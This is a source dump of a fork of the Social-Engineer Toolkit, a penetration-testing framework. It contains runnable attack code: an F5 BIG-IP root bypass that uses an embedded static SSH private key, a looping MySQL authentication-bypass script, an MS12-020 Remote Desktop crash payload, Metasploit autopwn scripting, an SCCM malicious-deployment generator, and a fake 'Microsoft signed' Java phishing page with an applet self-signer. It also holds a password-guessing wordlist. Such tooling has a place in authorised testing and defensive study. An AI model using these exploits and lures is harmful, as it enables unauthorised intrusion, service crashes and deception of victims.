-------------------------------------------------------------------------------- /src/core/reports/files/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/logo.png -------------------------------------------------------------------------------- /src/core/reports/files/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/main.png -------------------------------------------------------------------------------- /src/core/reports/files/rss.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/rss.png -------------------------------------------------------------------------------- /src/core/reports/files/tweet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/reports/files/tweet.png -------------------------------------------------------------------------------- /src/core/ssl/PoC_SSL.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import socket, os 3 | from SocketServer import BaseServer 4 | from BaseHTTPServer import HTTPServer 5 | from SimpleHTTPServer import SimpleHTTPRequestHandler 6 | from OpenSSL import SSL 7 | 8 | 9 | class SecureHTTPServer(HTTPServer): 10 | def __init__(self, server_address, HandlerClass): 11 | BaseServer.__init__(self, server_address, HandlerClass) 12 | ctx = SSL.Context(SSL.SSLv23_METHOD) 13 | #server.pem's location (containing the server private key and 14 | #the server certificate). 15 | fpem_priv = 'newreq.pem' # server 16 | fpem_cli = 'newcert.pem' # cli 17 | ctx.use_privatekey_file (fpem_priv) 18 | ctx.use_certificate_file(fpem_cli) 19 | self.socket = SSL.Connection(ctx, socket.socket(self.address_family, 20 | self.socket_type)) 21 | self.server_bind() 22 | self.server_activate() 23 | 24 | def shutdown_request(self,request): request.shutdown() 25 | 26 | class SecureHTTPRequestHandler(SimpleHTTPRequestHandler): 27 | def setup(self): 28 | self.connection = self.request 29 | self.rfile = socket._fileobject(self.request, "rb", self.rbufsize) 30 | self.wfile = socket._fileobject(self.request, "wb", self.wbufsize) 31 | 32 | 33 | def main_server(HandlerClass = SecureHTTPRequestHandler, 34 | ServerClass = SecureHTTPServer): 35 | server_address = ('', 443) # (address, port) 36 | httpd = ServerClass(server_address, HandlerClass) 37 | sa = httpd.socket.getsockname() 38 | print "Serving HTTPS on", sa[0], "port", sa[1], "..." 39 | 40 | if __name__ == '__main__': 41 | main_server() 42 | -------------------------------------------------------------------------------- /src/core/ssl/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/core/ssl/__init__.py -------------------------------------------------------------------------------- /src/core/ssl/setssl.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # Quick SSL Cert creation method 4 | # 5 | # Used if you want to create self signed 6 | 7 | from src.core.setcore import * 8 | import subprocess,os 9 | definepath=os.getcwd() 10 | os.chdir(setdir) 11 | # create the directories for us 12 | subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() 13 | # move into CA directory 14 | os.chdir("CA/") 15 | # create necessary files 16 | subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait() 17 | filewrite=file("openssl.cnf", "w") 18 | filewrite.write("""# 19 | # OpenSSL configuration file. 20 | # 21 | 22 | # Establish working directory. 23 | dir = . 24 | [ req ] 25 | default_bits = 1024 # Size of keys 26 | default_keyfile = key.pem # name of generated keys 27 | default_md = md5 # message digest algorithm 28 | string_mask = nombstr # permitted characters 29 | distinguished_name = req_distinguished_name 30 | 31 | [ req_distinguished_name ] 32 | # Variable name Prompt string 33 | #---------------------- ---------------------------------- 34 | 0.organizationName = Organization Name (company) 35 | organizationalUnitName = Organizational Unit Name (department, division) 36 | emailAddress = Email Address 37 | emailAddress_max = 40 38 | localityName = Locality Name (city, district) 39 | stateOrProvinceName = State or Province Name (full name) 40 | countryName = Country Name (2 letter code) 41 | countryName_min = 2 42 | countryName_max = 2 43 | commonName = Common Name (hostname, IP, or your name) 44 | commonName_max = 64 45 | 46 | # Default values for the above, for consistency and less typing. 47 | # Variable name Value 48 | #------------------------------ ------------------------------ 49 | 0.organizationName_default = The Sample Company 50 | localityName_default = Metropolis 51 | stateOrProvinceName_default = New York 52 | countryName_default = US 53 | 54 | [ v3_ca ] 55 | basicConstraints = CA:TRUE 56 | subjectKeyIdentifier = hash 57 | authorityKeyIdentifier = keyid:always,issuer:always""") 58 | # close editing of the file 59 | filewrite.close() 60 | subprocess.Popen("openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait() 61 | subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait() 62 | os.chdir(definepath) 63 | -------------------------------------------------------------------------------- /src/core/webserver.py: -------------------------------------------------------------------------------- 1 | import SimpleHTTPServer 2 | import BaseHTTPServer 3 | import httplib 4 | import os 5 | import sys 6 | from src.core.setcore import * 7 | 8 | # specify the web port 9 | web_port = check_config("WEB_PORT=") 10 | 11 | class StoppableHttpRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): 12 | """http request handler with QUIT stopping the server""" 13 | 14 | def do_QUIT(self): 15 | """send 200 OK response, and set server.stop to True""" 16 | self.send_response(200) 17 | self.end_headers() 18 | self.server.stop = True 19 | 20 | def do_POST(self): 21 | # We could also process paremeters here using something like below. 22 | self.do_GET() 23 | 24 | def send_head(self): 25 | # This is ripped directly from SimpleHTTPRequestHandler, only the cookie part is added. 26 | """Common code for GET and HEAD commands. 27 | 28 | This sends the response code and MIME headers. 29 | 30 | Return value is either a file object (which has to be copied 31 | to the outputfile by the caller unless the command was HEAD, 32 | and must be closed by the caller under all circumstances), or 33 | None, in which case the caller has nothing further to do. 34 | 35 | """ 36 | path = self.translate_path(self.path) 37 | f = None 38 | if os.path.isdir(path): 39 | if not self.path.endswith('/'): 40 | # redirect browser - doing basically what apache does 41 | self.send_response(301) 42 | self.send_header("Location", self.path + "/") 43 | self.end_headers() 44 | return None 45 | for index in "index.html", "index.htm": 46 | index = os.path.join(path, index) 47 | if os.path.exists(index): 48 | path = index 49 | break 50 | else: 51 | return self.list_directory(path) 52 | ctype = self.guess_type(path) 53 | if ctype.startswith('text/'): 54 | mode = 'r' 55 | else: 56 | mode = 'rb' 57 | try: 58 | f = open(path, mode) 59 | except IOError: 60 | self.send_error(404, "File not found") 61 | return None 62 | self.send_response(200) 63 | self.send_header("Content-type", ctype) 64 | fs = os.fstat(f.fileno()) 65 | self.send_header("Content-Length", str(fs[6])) 66 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 67 | self.end_headers() 68 | return f 69 | 70 | class StoppableHttpServer(BaseHTTPServer.HTTPServer): 71 | """http server that reacts to self.stop flag""" 72 | 73 | def serve_forever(self): 74 | """Handle one request at a time until stopped.""" 75 | self.stop = False 76 | while not self.stop: 77 | self.handle_request() 78 | 79 | # stop the http server 80 | def stop_server(web_port): 81 | web_port = int(web_port) 82 | """send QUIT request to http server running on localhost:""" 83 | conn = httplib.HTTPConnection("localhost:%d" % web_port) 84 | conn.request("QUIT", "/") 85 | conn.getresponse() 86 | 87 | # start the http server 88 | def start_server(web_port, path): 89 | os.chdir(path) 90 | web_port = int(web_port) 91 | server = StoppableHttpServer(('', web_port), StoppableHttpRequestHandler) 92 | server.serve_forever() 93 | -------------------------------------------------------------------------------- /src/dev-notes/TODO: -------------------------------------------------------------------------------- 1 | rel1k: 2 | 3 | - add ability to read in port number and IP address (ie. ip:1433) 4 | 5 | j0fer: 6 | Add configuration option in set_config to specify sendmail location. Currently hard coded. 7 | -------------------------------------------------------------------------------- /src/dev-notes/html_color.txt: -------------------------------------------------------------------------------- 1 | 0193d0 2 | font: century gothic 3 | -------------------------------------------------------------------------------- /src/fasttrack/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/autopwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # 4 | # Metasploit Autopwn functionality 5 | # 6 | # 7 | from src.core import setcore 8 | import pexpect 9 | 10 | 11 | # this will load the database 12 | def prep(database, ranges): 13 | print "\n" 14 | setcore.PrintStatus("Prepping the answer file based on what was specified.") 15 | # prep the file to be written 16 | filewrite=file("src/program_junk/autopwn.answer", "w") 17 | setcore.PrintStatus("Using the " + database + "sql driver for autopwn") 18 | filewrite.write("db_driver " + database + "\r\n") 19 | setcore.PrintStatus("Autopwn will attack the following systems: " + ranges) 20 | filewrite.write("db_nmap " + ranges + "\r\n") 21 | filewrite.write("db_autopwn -p -t -e -r\r\n") 22 | filewrite.write("jobs -K\r\n") 23 | filewrite.write("sessions -l\r\n") 24 | filewrite.close() 25 | setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n") 26 | 27 | 28 | def launch(): 29 | """ here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks 30 | database support for msfconsole for some reason. reported this as a bug, may be fixed soon... until then 31 | if path variables aren't set for msfconsole this will break, even if its specified in set_config """ 32 | 33 | # launch the attack 34 | setcore.PrintStatus("Launching Metasploit and attacking the systems specified. This may take a moment..") 35 | # try/catch block 36 | try: 37 | child = pexpect.spawn("%msfconsole -r %s/autopwn.answer\r\n\r\n" % (meta_path,setdir)) 38 | child.interact() 39 | 40 | # handle exceptions and log them 41 | except Exception, error: setcore.log(error) 42 | 43 | 44 | def do_autopwn(): 45 | print 'Doing do_autopwn' 46 | # pull the metasploit database 47 | database = setcore.meta_database() 48 | range = raw_input(setcore.setprompt(["19","20"], "Enter the IP ranges to attack (nmap syntax only)")) 49 | 50 | # prep the answer file 51 | prep(database, range) 52 | confirm_attack = raw_input(setcore.setprompt(["19","20"], "You are about to attack systems are you sure [y/n]")) 53 | 54 | # if we are sure, then lets do it 55 | if confirm_attack == "yes" or confirm_attack == "y": 56 | launch() 57 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/exploits/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/exploits/f5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) 4 | # 5 | # Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass 6 | # http://www.trustedsec.com 7 | # 8 | # 9 | import subprocess,os 10 | 11 | filewrite = file("priv.key", "w") 12 | filewrite.write("""-----BEGIN RSA PRIVATE KEY----- 13 | MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh 14 | UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk 15 | OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB 16 | gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF 17 | 8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv 18 | 7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM 19 | 2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s 20 | 37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL 21 | RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4 22 | rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/ 23 | uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU 24 | Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G 25 | LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS 26 | -----END RSA PRIVATE KEY-----""") 27 | filewrite.close() 28 | subprocess.Popen("chmod 700 priv.key", shell=True).wait() 29 | print """ 30 | Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) 31 | 32 | Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass 33 | http://www.trustedsec.com 34 | """ 35 | ipaddr=raw_input("Enter the IP address of the F5: ") 36 | subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait() 37 | 38 | if os.path.isfile("priv.key"): 39 | os.remove("priv.key") 40 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/mysql_bypass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # 4 | # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. 5 | # 6 | # Title: MySQL Remote Root Authentication Bypass 7 | # Written by: Dave Kennedy (ReL1K) 8 | # http://www.trustedsec.com 9 | # 10 | # Original advisory here: seclists.org/oss-sec/2012/q2/493 11 | # 12 | import subprocess 13 | 14 | print """ 15 | This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. 16 | 17 | Title: MySQL Remote Root Authentication Bypass 18 | Written by: Dave Kennedy (ReL1K) 19 | http://www.trustedsec.com 20 | 21 | Original advisory here: seclists.org/oss-sec/2012/q2/493 22 | 23 | Note, you will see a number of failed login attempts, after about 300, if it doesn't 24 | work, then its not vulnerable. 25 | """ 26 | ipaddr = raw_input("Enter the IP address of the mysql server: ") 27 | 28 | while 1: 29 | subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait() 30 | -------------------------------------------------------------------------------- /src/fasttrack/exploits/rdpdos.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: Pakyu Cenloder 2 | # Date: March 16 2012 3 | # Author: BMario 4 | # Application Link: Microsoft Terminal Services / Remote Desktop Services 5 | # http://msdn.microsoft.com/en-us/library/aa383015(v=vs.85).aspx 6 | # Version: any Windows version before 13 Mar 2012 7 | # Platforms: Windows 8 | # Bug: use after free 9 | # Exploitation: remote, versus server 10 | # Author: Stanley Marshall 11 | # Tested on: Windows 7 32bit 12 | # CVE : MS12-020 13 | 14 | import socket 15 | import sys 16 | 17 | print "Microsoft Terminal Services / Remote Desktop Services - Denial of Service" 18 | 19 | headpack = "030000130ee000000000000100080000000000".decode('hex') 20 | dafuq = "030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0".decode('hex') 21 | dafree = "0300000802f08028".decode('hex') 22 | 23 | trololo = headpack+dafuq+dafree 24 | 25 | #HOSTNYO = sys.argv[1] 26 | HOSTNYO = raw_input("Enter the IP address to crash (remote desktop): ") 27 | PORTNYO = 3389 28 | for i in range(10240): 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | s.connect((HOSTNYO,PORTNYO)) 31 | s.send(trololo) 32 | rec = s.recv(1024) 33 | s.close() 34 | -------------------------------------------------------------------------------- /src/fasttrack/sccm/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/fasttrack/sccm/__init__.py -------------------------------------------------------------------------------- /src/fasttrack/sccm/sccm_main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from src.core.setcore import * 3 | print "The" + bcolors.BOLD + " SCCM Attack Vector " + bcolors.ENDC + "will utilize the SCCM configurations to deploy malicious software. \n\nYou need to have the SMSServer name and a PackageID you want to package on the website. Then you need to copy this configuration file to the startup directory for all of the users on the server." 4 | 5 | sms_server = raw_input("Enter the IP address or hostname of the SMS Server: ") 6 | package_id = raw_input("Enter the Package ID of the package you want to patch: ") 7 | 8 | configuration = ''' 9 | # configuration file written by Dave DeSimone and Bill Readshaw 10 | # attack vector presented at Defcon 20 11 | # added to set 07/27/2012 12 | 13 | strSMSServer = "%s" 14 | strPackageID = "%s" 15 | 16 | Set objLoc = CreateObject("WbemScripting.SWbemLocator") 17 | Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms") 18 | Set Results = objSMS.ExecQuery _ 19 | ("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true") 20 | For each Loc in Results 21 | If Loc.ProviderForLocalSite = True Then 22 | Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _ 23 | Loc.SiteCode) 24 | strSMSSiteCode = Loc.SiteCode 25 | end if 26 | Next 27 | 28 | Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'") 29 | for each objPkg in objPkgs 30 | objPkg.RefreshPkgSource(0) 31 | Next 32 | ''' % (sms_server, package_id) 33 | 34 | # write out the file to reports 35 | filewrite = file(setdir + "/reports/sccm_configuration.txt", "w") 36 | filewrite.write(configuration) 37 | filewrite.close() 38 | print_status("The SCCM configuration script has been successfully created.") 39 | print_status("You need to copy the script to the startup folder of the server.") 40 | print_status("Report has been exported to %s/reports/sccm_configuration.txt" % (definepath)) 41 | pause = raw_input("Press " + bcolors.RED + "{return} " + bcolors.ENDC + "to exit this menu.") 42 | -------------------------------------------------------------------------------- /src/fasttrack/wordlist.txt: -------------------------------------------------------------------------------- 1 | P@55w0rd 2 | P@ssw0rd! 3 | P@55w0rd! 4 | sqlsqlsqlsql 5 | SQLSQLSQLSQL 6 | Welcome123 7 | Welcome1234 8 | Welcome1212 9 | PassSql12 10 | network 11 | networking 12 | networks 13 | test 14 | testtest 15 | testing 16 | testing123 17 | testsql 18 | test-sql3 19 | sqlsqlsqlsqlsql 20 | bankbank 21 | default 22 | test 23 | testing 24 | password2 25 | 26 | password 27 | Password1 28 | Password1! 29 | P@ssw0rd 30 | password12 31 | Password12 32 | security 33 | security1 34 | security3 35 | secuirty3 36 | complex1 37 | complex2 38 | complex3 39 | sqlserver 40 | sql 41 | sqlsql 42 | password1 43 | password123 44 | complexpassword 45 | database 46 | server 47 | changeme 48 | change 49 | sqlserver2000 50 | sqlserver2005 51 | Sqlserver 52 | SqlServer 53 | Password1 54 | Password2 55 | P@ssw0rd 56 | P@ssw0rd! 57 | P@55w0rd! 58 | P@ssword! 59 | Password! 60 | password! 61 | sqlsvr 62 | sqlaccount 63 | account 64 | sasa 65 | sa 66 | administator 67 | pass 68 | sql 69 | microsoft 70 | sqlserver 71 | sa 72 | hugs 73 | sasa 74 | welcome 75 | welcome1 76 | welcome2 77 | march2011 78 | sqlpass 79 | sqlpassword 80 | guessme 81 | bird 82 | P@55w0rd! 83 | test 84 | dev 85 | qa 86 | god 87 | admin 88 | adminadmin 89 | admins 90 | goat 91 | sysadmin 92 | water 93 | dirt 94 | air 95 | earth 96 | company 97 | secret 98 | sqlpass123 99 | Summer2013 100 | Summer2012 101 | Summer2011 102 | Summer2010 103 | Summer2009 104 | Summer2008 105 | Winter2013 106 | Winter2012 107 | Winter2011 108 | Winter2010 109 | Winter2009 110 | Winter2008 111 | summer2013 112 | summer2012 113 | summer2011 114 | summer2010 115 | summer2009 116 | summer2008 117 | winter2013 118 | winter2012 119 | winter2011 120 | winter2010 121 | winter2009 122 | winter2008 123 | 123456 124 | abcd123 125 | abc 126 | burp 127 | private 128 | unknown 129 | wicked 130 | alpine 131 | trust 132 | microsoft 133 | sql2000 134 | sql2003 135 | sql2005 136 | sql2008 137 | vista 138 | xp 139 | nt 140 | 98 141 | 95 142 | 2003 143 | 2008 144 | someday 145 | sql2010 146 | sql2011 147 | sql2009 148 | complex 149 | goat 150 | changelater 151 | rain 152 | fire 153 | snow 154 | -------------------------------------------------------------------------------- /src/html/Signed_Update.jar.orig: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/Signed_Update.jar.orig -------------------------------------------------------------------------------- /src/html/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/__init__.py -------------------------------------------------------------------------------- /src/html/fasttrack_http_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import os 3 | import sys 4 | definepath=os.getcwd() 5 | sys.path.append(definepath) 6 | from src.core.setcore import * 7 | start_web_server_unthreaded(setdir + "/web_clone/") 8 | -------------------------------------------------------------------------------- /src/html/templates/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/templates/__init__.py -------------------------------------------------------------------------------- /src/html/templates/java/index.template: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Java Required 6 | 7 | 8 | 9 | 10 | 11 | 12 | 25 | 26 | 27 | 28 | 29 | 30 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 76 | 77 | 78 |
  13 | 14 | 15 | 16 | 23 | 24 |
Java Required! 17 |
18 | Search the website
19 | 20 | 21 |
22 |
 
  31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 |
Home
Services
About
Help
Links
 
 

Welcome to the website, you must hava Java in order to view this page properly. Ensure that the Microsoft signed Java box that pops up is accepted to load the site content.


 
  49 | 50 | 51 | 62 | 63 |
Welcome to the site! This site requires Java in order to run properly. Words from our CEO "Java Required to view content."
52 |
53 | 54 | Instructions to view the website:

55 | 56 | 1. A pop-up box will prompt, please hit "Yes". This may take a few moments.
57 | 2. This pop-up is signed through the Microsoft Corporation and will provide you with necessary updates to view the site.
58 | 3. Once you have accepted, wait about 10 to 15 seconds and the page will load.
59 | 60 | You must first click "Run" for the signed Java component from Microsoft in order to view our site successfully. 61 |





64 | 		 
 
You must first click "Run" for the signed Java component from Microsoft in order to view our site successfully. Java is a well trusted and industry used component for websites.
 
 

Home | Services | About | Help | Links

74 |

All rights reserved ©
75 |

 
79 | 80 | 81 | -------------------------------------------------------------------------------- /src/html/templates/template.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import os 4 | import shutil 5 | import glob 6 | from src.core.setcore import * 7 | 8 | me = mod_name() 9 | dest = "src/html/" 10 | 11 | debug_msg(me,"entering src.html.templates.template'",1) 12 | 13 | # 14 | # used for pre-defined templates 15 | # 16 | print """ 17 | 1. Java Required 18 | 2. Google 19 | 3. Facebook 20 | 4. Twitter 21 | 5. Yahoo 22 | """ 23 | choice=raw_input(setprompt(["2"],"Select a template")) 24 | 25 | if choice == "exit": 26 | exit_set() 27 | 28 | # file used for nextpage in java applet attack 29 | filewrite=file(setdir + "/site.template", "w") 30 | 31 | # if nothing is selected 32 | if choice == "": choice = "1" 33 | 34 | # if java required 35 | if choice == "1": 36 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 37 | shutil.copyfile("src/html/templates/java/index.template", "src/html/index.template") 38 | URL="" 39 | 40 | # if google 41 | if choice == "2": 42 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 43 | shutil.copyfile("src/html/templates/google/index.template", "src/html/index.template") 44 | URL="http://www.google.com" 45 | 46 | # if facebook 47 | if choice == "3": 48 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 49 | for files in glob.glob('src/html/templates/facebook/*.*'): shutil.copy(files, "src/html/") 50 | URL="http://www.facebook.com" 51 | 52 | # if twitter 53 | if choice == "4": 54 | if os.path.isfile("src/html/index.template"): 55 | os.remove("src/html/index.template") 56 | shutil.copyfile("src/html/templates/twitter/index.template", "src/html/index.template") 57 | URL="http://www.twitter.com" 58 | 59 | # if yahoo 60 | if choice =="5": 61 | if os.path.isfile("src/html/index.template"): os.remove("src/html/index.template") 62 | shutil.copyfile("src/html/templates/yahoo/index.template", "src/html/index.template") 63 | URL="http://mail.yahoo.com" 64 | 65 | if not os.path.isdir(setdir + "/web_clone"): 66 | os.makedirs(setdir + "/web_clone/") 67 | if os.path.isfile(setdir + "/web_clone/index.html"): os.remove(setdir + "/web_clone/index.html") 68 | shutil.copyfile("src/html/index.template", setdir + "/web_clone/index.html") 69 | filewrite.write("TEMPLATE=SELF" + "\n"+"URL=%s" % (URL)) 70 | filewrite.close() 71 | 72 | debug_msg(me,"exiting src.html.templates.template'",1) 73 | -------------------------------------------------------------------------------- /src/html/unsigned/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/unsigned/__init__.py -------------------------------------------------------------------------------- /src/html/unsigned/self_sign.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import subprocess 4 | import os 5 | import sys 6 | from src.core.setcore import * 7 | 8 | ######################### 9 | # Simple signer for signing the java applet attack 10 | ######################### 11 | 12 | # create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass 13 | # sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet 14 | 15 | os.chdir("src/html/unsigned") 16 | 17 | print """ 18 | Simply enter in the required fields, easy example below: 19 | 20 | Name: FakeCompany 21 | Organization: Fake Company 22 | Organization Name: Fake Company 23 | City: Cleveland 24 | State: Ohio 25 | Country: US 26 | Is this correct: yes 27 | """ 28 | 29 | print_error("*** WARNING ***") 30 | print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk") 31 | print_error("*** WARNING ***") 32 | 33 | # random string used to generate signature of java applet 34 | random_string = generate_random_string(10, 30) 35 | 36 | # grab keystore to use later 37 | subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait() 38 | 39 | # self-sign the applet 40 | subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait() 41 | 42 | # move it into our html directory 43 | subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait() 44 | subprocess.Popen("mv Signed_Update.jar " + setdir, shell=True) 45 | 46 | # move back to original directory 47 | os.chdir("../../../") 48 | print_status("Java Applet is now signed and will be imported into the website") 49 | -------------------------------------------------------------------------------- /src/html/unsigned/unsigned.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/html/unsigned/unsigned.jar -------------------------------------------------------------------------------- /src/html/web_start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This is just a simple import for web_start 3 | import sys 4 | import setcore 5 | me = setcore.mod_name() 6 | setcore.debug_msg(me,"importing 'src.html.spawn'",1) 7 | sys.path.append("src/html") 8 | try: reload(spawn) 9 | except: pass 10 | -------------------------------------------------------------------------------- /src/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/__init__.py -------------------------------------------------------------------------------- /src/payloads/exe/shellcodeexec.binary: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/n10Hacx/social-engineer-toolkit-https-github.com-trustedsec-social-engineer-toolkit/94453eccdab04476dcff72cbb3bbdea6ce96aadb/src/payloads/exe/shellcodeexec.binary -------------------------------------------------------------------------------- /src/payloads/exe/shellcodeexec.c: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Shellcodeexec - original work from Bernardo Damele 4 | 5 | Customized for the Social-Engineer Toolkit (SET) by Dave Kennedy (ReL1K) 6 | 7 | In order to build properly within VS C++ 2010 Express 8 | 9 | Under project properties 10 | change Configuration to Release. 11 | Configuration Properties | C/C++ | Code Generation 12 | Runtime Library setting. It is set to this: Multi-threaded DLL (/MD) 13 | Change it 